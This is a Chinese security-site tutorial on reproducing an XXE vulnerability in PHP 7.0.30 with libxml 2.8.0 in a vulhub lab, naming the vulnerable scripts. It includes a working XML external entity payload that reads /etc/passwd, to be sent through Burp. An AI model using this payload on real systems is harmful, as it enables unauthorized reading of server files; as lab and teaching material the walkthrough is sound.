标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-2729]   作者: 浩丶轩 发表于: [2020-08-07]

本文共 [426] 位读者顶过

利用vulhub搭建环境(Vulhub是一个面向大众的开源漏洞靶场)[出自:jiwo.org]
漏洞版本:

- PHP 7.0.30
- libxml 2.8.0

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

编译并启动环境

访问 http://xxx.xxx.xxx.xxx:8080 进入主页看到phpinfo,查看libxml版本是否为2.9.0以下。

目录下有dom.php、index.php、SimpleXMLElement.php、simplexml_load_string.php其中dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞。

XXE payload

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <name>&xxe;</name> </root>
burp抓包进行更改


评论

暂无
发表评论
 返回顶部 
热度(426)
 关注微信